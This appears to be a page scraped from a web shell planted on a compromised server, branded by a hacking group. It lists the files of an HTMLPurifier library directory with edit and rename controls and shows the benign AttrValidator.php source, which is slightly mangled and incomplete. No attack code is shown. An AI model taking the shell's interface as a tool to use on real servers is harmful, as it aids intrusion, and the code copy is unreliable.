Shell Bypass 403 GE-C666C

Ghost Exploiter Team Official

Directory >> /var/www/html/back/vendor/ezyang/htmlpurifier/library/HTMLPurifier/

File / Folder	Size	Action
.	-
AttrDef	--	ren
AttrTransform	--	ren
ChildDef	--	ren
ConfigSchema	--	ren
DefinitionCache	--	ren
EntityLookup	--	ren
Filter	--	ren
HTMLModule	--	ren
Injector	--	ren
Language	--	ren
Lexer	--	ren
Node	--	ren
Printer	--	ren
Strategy	--	ren
TagTransform	--	ren
Token	--	ren
URIFilter	--	ren
URIScheme	--	ren
VarParser	--	ren
Arborize.php	2.49KB	edt ren
AttrCollections.php	4.748KB	edt ren
AttrDef.php	5.073KB	edt ren
AttrTransform.php	1.942KB	edt ren
AttrTypes.php	3.662KB	edt ren
AttrValidator.php	6.419KB	edt ren
Bootstrap.php	2.637KB	edt ren
CSSDefinition.php	19.489KB	edt ren
ChildDef.php	1.522KB	edt ren
Config.php	31.065KB	edt ren
ConfigSchema.php	5.757KB	edt ren
ContentSets.php	5.473KB	edt ren
Context.php	2.363KB	edt ren
Definition.php	1.329KB	edt ren
DefinitionCache.php	3.821KB	edt ren
DefinitionCacheFactory.php	3.119KB	edt ren
Doctype.php	1.545KB	edt ren
DoctypeRegistry.php	4.117KB	edt ren
ElementDef.php	7.354KB	edt ren
Encoder.php	25.106KB	edt ren
EntityLookup.php	1.393KB	edt ren
EntityParser.php	9.801KB	edt ren
ErrorCollector.php	7.446KB	edt ren
ErrorStruct.php	1.849KB	edt ren
Exception.php	0.173KB	edt ren
Filter.php	1.587KB	edt ren
Generator.php	10.012KB	edt ren
HTMLDefinition.php	17.166KB	edt ren
HTMLModule.php	9.956KB	edt ren
HTMLModuleManager.php	15.469KB	edt ren
IDAccumulator.php	1.608KB	edt ren
Injector.php	8.795KB	edt ren
Language.php	5.92KB	edt ren
LanguageFactory.php	6.298KB	edt ren
Length.php	3.801KB	edt ren
Lexer.php	12.711KB	edt ren
Node.php	1.25KB	edt ren
PercentEncoder.php	3.481KB	edt ren
Printer.php	5.759KB	edt ren
PropertyList.php	2.718KB	edt ren
PropertyListIterator.php	0.873KB	edt ren
Queue.php	1.515KB	edt ren
Strategy.php	0.744KB	edt ren
StringHash.php	1.073KB	edt ren
StringHashParser.php	3.556KB	edt ren
TagTransform.php	1.072KB	edt ren
Token.php	2.173KB	edt ren
TokenFactory.php	3.026KB	edt ren
URI.php	10.367KB	edt ren
URIDefinition.php	3.35KB	edt ren
URIFilter.php	2.31KB	edt ren
URIParser.php	2.24KB	edt ren
URIScheme.php	3.399KB	edt ren
URISchemeRegistry.php	2.353KB	edt ren
UnitConverter.php	9.908KB	edt ren
VarParser.php	5.85KB	edt ren
VarParserException.php	0.153KB	edt ren
Zipper.php	4.338KB	edt ren

<?php

/**
 * Validates the attributes of a token. Doesn't manage required attributes
 * very well. The only reason we factored this out was because RemoveForeignElements
 * also needed it besides ValidateAttributes.
 */
class HTMLPurifier_AttrValidator
{

/**
     * Validates the attributes of a token, mutating it as necessary.
     * that has valid tokens
     * @param HTMLPurifier_Token $token Token to validate.
     * @param HTMLPurifier_Config $config Instance of HTMLPurifier_Config
     * @param HTMLPurifier_Context $context Instance of HTMLPurifier_Context
     */
    public function validateToken($token, $config, $context)
    {
        $definition = $config->getHTMLDefinition();
        $e =& $context->get('ErrorCollector', true);

// initialize IDAccumulator if necessary
        $ok =& $context->get('IDAccumulator', true);
        if (!$ok) {
            $id_accumulator = HTMLPurifier_IDAccumulator::build($config, $context);
            $context->register('IDAccumulator', $id_accumulator);
        }

// initialize CurrentToken if necessary
        $current_token =& $context->get('CurrentToken', true);
        if (!$current_token) {
            $context->register('CurrentToken', $token);
        }

if (!$token instanceof HTMLPurifier_Token_Start &&
            !$token instanceof HTMLPurifier_Token_Empty
        ) {
            return;
        }

// create alias to global definition array, see also $defs
        // DEFINITION CALL
        $d_defs = $definition->info_global_attr;

// don't update token until the very end, to ensure an atomic update
        $attr = $token->attr;

// do global transformations (pre)
        // nothing currently utilizes this
        foreach ($definition->info_attr_transform_pre as $transform) {
            $attr = $transform->transform($o = $attr, $config, $context);
            if ($e) {
                if ($attr != $o) {
                    $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr);
                }
            }
        }

// do local transformations only applicable to this element (pre)
        // ex. <p align="right"> to <p style="text-align:right;">
        foreach ($definition->info[$token->name]->attr_transform_pre as $transform) {
            $attr = $transform->transform($o = $attr, $config, $context);
            if ($e) {
                if ($attr != $o) {
                    $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr);
                }
            }
        }

// create alias to this element's attribute definition array, see
        // also $d_defs (global attribute definition array)
        // DEFINITION CALL
        $defs = $definition->info[$token->name]->attr;

$attr_key = false;
        $context->register('CurrentAttr', $attr_key);

// iterate through all the attribute keypairs
        // Watch out for name collisions: $key has previously been used
        foreach ($attr as $attr_key => $value) {

// call the definition
            if (isset($defs[$attr_key])) {
                // there is a local definition defined
                if ($defs[$attr_key] === false) {
                    // We've explicitly been told not to allow this element.
                    // This is usually when there's a global definition
                    // that must be overridden.
                    // Theoretically speaking, we could have a
                    // AttrDef_DenyAll, but this is faster!
                    $result = false;
                } else {
                    // validate according to the element's definition
                    $result = $defs[$attr_key]->validate(
                        $value,
                        $config,
                        $context
                    );
                }
            } elseif (isset($d_defs[$attr_key])) {
                // there is a global definition defined, validate according
                // to the global definition
                $result = $d_defs[$attr_key]->validate(
                    $value,
                    $config,
                    $context
                );
            } else {
                // system never heard of the attribute? DELETE!
                $result = false;
            }

// put the results into effect
            if ($result === false || $result === null) {
                // this is a generic error message that should replaced
                // with more specific ones when possible
                if ($e) {
                    $e->send(E_ERROR, 'AttrValidator: Attribute removed');
                }

// remove the attribute
                unset($attr[$attr_key]);
            } elseif (is_string($result)) {
                // generally, if a substitution is happening, there
                // was some sort of implicit correction going on. We'll
                // delegate it to the attribute classes to say exactly what.

// simple substitution
                $attr[$attr_key] = $result;
            } else {
                // nothing happens
            }

// we'd also want slightly more complicated substitution
            // involving an array as the return value,
            // although we're not sure how colliding attributes would
            // resolve (certain ones would be completely overridden,
            // others would prepend themselves).
        }

$context->destroy('CurrentAttr');

// post transforms

// global (error reporting untested)
        foreach ($definition->info_attr_transform_post as $transform) {
            $attr = $transform->transform($o = $attr, $config, $context);
            if ($e) {
                if ($attr != $o) {
                    $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr);
                }
            }
        }

// local (error reporting untested)
        foreach ($definition->info[$token->name]->attr_transform_post as $transform) {
            $attr = $transform->transform($o = $attr, $config, $context);
            if ($e) {
                if ($attr != $o) {
                    $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr);
                }
            }
        }

$token->attr = $attr;

// destroy CurrentToken if we made it ourselves
        if (!$current_token) {
            $context->destroy('CurrentToken');
        }

}

// vim: et sw=4 sts=4